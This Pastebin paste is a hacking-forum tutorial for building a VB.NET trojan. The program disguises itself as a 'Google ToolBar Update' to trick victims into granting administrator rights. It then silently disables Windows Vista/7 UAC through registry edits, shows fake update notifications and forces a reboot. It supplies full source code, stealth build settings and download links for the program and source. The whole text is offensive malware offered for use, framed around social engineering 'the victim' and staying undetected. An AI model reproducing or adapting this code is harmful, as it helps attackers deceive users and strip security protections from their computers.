API tools faq
paste
Advertisement
Kulverstukas

tutorial

Kulverstukas
Aug 5th, 2010
40
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.42 KB | None | 0 0
raw download clone embed print report
  1. (Guess the preview function is broken o.O so expect edits for a while ^^)
  2.  
  3. Hello everyone, today I will show you a basic way to kill the Windows 7 / Vista's UAC control.
  4.  
  5. To do this we are going to rely on two thing:
  6.  
  7. 1.) The victims natural ability to trust known applications (Social Engineering)
  8. 2.) Basic knowledge of vb.net to keep the program fully undetected.
  9. ----------------------------------------------------------------------------------------------
  10.  
  11. To start off we will need to create a new Project.
  12.  
  13. http://img408.imageshack.us/img408/770/12679432.png
  14.  
  15. You can of course name it what ever you want but for the tutorials sake I named it UAC Bypass. (Even though it is actually a killer hehe)
  16.  
  17. Next up we need to add a few controls to out form. I will have the application run hidden while displaying messages to the user through a timed delay, along with those messages I will add a friendly looking notification icon within the users tray to give them an update on well.. the update.
  18.  
  19. To do the above I am going to add two controls; A Timer, and a Notification Icon.
  20.  
  21. To add a new control to your form look at your toolbox on the left side of the screen and drag/drop the control onto your form, once you get the two controls added your form should look something like this:
  22.  
  23. http://img691.imageshack.us/img691/5348/49452042.png
  24.  
  25.  
  26. Once you have the two controls added to your application head over to its properties (on the right side of the screen apposing the toolbox) and change the fallowing settings:
  27.  
  28. Opacity: 0%
  29. Show Icon: False
  30. Show In Taskbar: False
  31. Windows State: Minimized
  32.  
  33. http://img156.imageshack.us/img156/4336/70893126.png
  34.  
  35.  
  36. After that we head into our project's properties
  37.  
  38. http://img192.imageshack.us/img192/3628/23083517.png
  39.  
  40.  
  41. And change the Assembly name and the Root namespace to make it seem more trusting (Now you can have these changed to something more trusting by default when you create the application, if you created the application with the name "GoogleTBupdate" then those two fields would already say what we are about to make it say)
  42.  
  43. Assembly Name: GoogleTBupdate
  44. Root Namespace: GoogleTBupdate
  45.  
  46.  
  47. http://img171.imageshack.us/img171/4841/57173400.png
  48.  
  49.  
  50. Next up we head over into our Assembly information and make it change it accordingly:
  51. http://img375.imageshack.us/img375/5958/26463599.png
  52.  
  53. Click OK and then move on into UAC Settings and change the fallowing line of code:
  54.  
  55. Change:
  56. Code: [Select]
  57. <requestedExecutionLevel level="asInvoker" uiAccess="false" />
  58. To:
  59. Code: [Select]
  60. <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
  61. This will force the application to execute with administrative access helping us out later in the line, now you may be wondering "Why would the user run this as admin?" it is simple, because when we changed our assembly information we changed what it says on the "Requesting Administrative Control" prompt, it will now ask if GoogleTBupdate can have administrative control. Because of this people will be more trusting to allow it to run.
  62.  
  63. Congrats! You completed step one, now that your application setup we can begin programing!
  64.  
  65. ==To get into the coding console just double click on your form.==
  66.  
  67. We will start off by importing Microsoft.Win32, to do that we will add the fallowing line of code to the very top of the console (Above public class Form1)
  68.  
  69. Code: [Select]
  70. Imports Microsoft.Win32
  71. From here we should see this in our console:
  72.  
  73. Quote
  74. Imports Microsoft.Win32
  75.  
  76. Public Class Form1
  77. Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
  78.  
  79. end sub
  80. end class
  81.  
  82. Now, Vista users do not have to restart in order to have their UAC settings saved, however, Windows 7 users do. Considering this we will need to program a way for the application to identify the current OperatingSystem and to take necessary actions. To do this we will declare a statement and give it the value containing the name of their OS. We do this through the Dim command as seen bellow:
  83.  
  84. Quote
  85. Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
  86. dim OS as string
  87. OS = My.Computer.Info.OSFullName
  88. end sub
  89.  
  90. What the above basically said was that we created a new value with the name OS and that OS was equal to the current computers full Operating System's name.
  91.  
  92. Next we need to tell the program what to do if the OS is running Vista or Win. 7, we will do this using an If/Then statement. I will explain the fallowing code in detail bellow:
  93. Quote
  94. Public Class Form1
  95. Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
  96. Dim OS As String
  97. OS = My.Computer.Info.OSFullName
  98. If OS.Contains("Vista") = False Then
  99. NotifyIcon1.Visible = True
  100. NotifyIcon1.BalloonTipTitle = "Google ToolBar Update"
  101. NotifyIcon1.BalloonTipText = "Downloading and Installing the Latest Build of Google ToolBar..."
  102. NotifyIcon1.BalloonTipIcon = ToolTipIcon.Info
  103. NotifyIcon1.ShowBalloonTip(10000)
  104. Timer1.interval = 30000
  105. Timer1.Start()
  106. Else
  107. Dim UAC As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True)
  108. UAC.SetValue("EnableLUA", 0)
  109. Dim UACbp As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True)
  110. UACbp.SetValue("ConsentPromptBehaviorAdmin", 0)
  111. NotifyIcon1.Visible = True
  112. NotifyIcon1.BalloonTipTitle = "Google ToolBar Update"
  113. NotifyIcon1.BalloonTipText = "Downloading and Installing the Latest Build of Google ToolBar..."
  114. NotifyIcon1.BalloonTipIcon = ToolTipIcon.Info
  115. NotifyIcon1.ShowBalloonTip(10000)
  116. Timer1.interval = 30000
  117. Timer1.Start()
  118. End If
  119. End Sub
  120.  
  121. What the If/Then statement is doing is telling the application "Hey, if they are not running Vista then do this first. But if they are running vista then do this."
  122.  
  123. ==Windows 7 Portion==
  124.  
  125. Because Win 7 needs a reboot in order to apply the settings and the security center notifies the user that the UAC settings have been changes we need to apply these changes then reboot as fast as possible, so we will apply these changes at the end.
  126.  
  127. Notifyicon1.* calls up the notifyicon control and tells it what to do and is pretty self explanatory.
  128.  
  129. Timer1.interval = 30000 tells the timer control to wait 30000 milliseconds (30 seconds) and then execute its action, at the moment after the 30 seconds are over nothing will happen, but we will change that shortly.
  130.  
  131. ==Windows Vista Portion==
  132.  
  133. Because windows Vista does not need to reboot in order to change its settings and we can disable a user notified message we will apply said changes sooner than later.
  134.  
  135. Quote
  136. Dim UAC As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True)
  137. UAC.SetValue("EnableLUA", 0)
  138. Dim UACbp As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True)
  139. UACbp.SetValue("ConsentPromptBehaviorAdmin", 0)
  140. The above is the heart and sole of the whole application, if this code segment fails then the entire application would have been pointless.
  141.  
  142. What we are doing is declare a new statement named UAC that will take on the registry key given.
  143. after that we tell our statement to give the registry key the given value (in this case we are given the registry key "EnableLUA" the value of 0 (off).
  144. Then we do the same with the next statement UACbp to disable the "Would you like to run this crap as admin?" prompt.
  145.  
  146. After that we use the same notifyicon and timer commands.
  147.  
  148. ==The Timer==
  149.  
  150. Now that we have our application doing something when it starts up we need to tell it to do something when the timer reaches 30 seconds.
  151.  
  152. I will explain the code in detail bellow:
  153. Quote
  154. Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
  155. Dim OS As String
  156. OS = My.Computer.Info.OSFullName
  157. If NotifyIcon1.BalloonTipText = "Update Installed!" = False Then
  158. NotifyIcon1.BalloonTipTitle = "Google ToolBar Update"
  159. NotifyIcon1.BalloonTipText = "Update Installed!"
  160. NotifyIcon1.BalloonTipIcon = ToolTipIcon.Info
  161. NotifyIcon1.ShowBalloonTip(5000)
  162. Timer1.Interval = 10000
  163. Else
  164. If OS.Contains("Vista") Then
  165. End
  166. Else
  167. MsgBox("Google ToolBar will now reboot the system.", MsgBoxStyle.Information, Title:="Google ToolBar Update Notification")
  168. Dim UAC As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True)
  169. UAC.SetValue("EnableLUA", 0)
  170. Dim UACbp As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True)
  171. UACbp.SetValue("ConsentPromptBehaviorAdmin", 0)
  172. System.Diagnostics.Process.Start("shutdown", "-r -t 00")
  173. End If
  174. End If
  175. End Sub
  176.  
  177. You may recognize the OS string again and you may be wondering why we need to use it again, well it is simply because when used within a sub the dim command will only refer to that sub.
  178.  
  179. Onto the first IF/Then statement, what it is saying is "If the notifyicon does not say that the update is installed then we need to make it say that, if not then we move on to the next segment of code"
  180.  
  181. The next IF/Then statement says "If the OS contains Vista then we can close the application (End), but if not then we need to apply the registry changes and restart the computer ASAP"
  182.  
  183. Once we finish coding our timer we are done! Just compile the application and everything should work perfectly, if not then you did something wrong.
  184.  
  185. Download program set: http://www.multiupload.com/MI2M1V6BRS
  186.  
  187. Download Source: http://www.multiupload.com/F1KBRB350Z
  188.  
  189. .:: Tutorial and Method Written and Coded By Kamakzy56 ::.
  190.  
  191. I do Not give you permission to edit and re-use this tutorial on other forums or websites
  192. I do give you permission to modify the source file any way you want.
  193. I do Not give you permission to say you where the original one to come up with this method.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!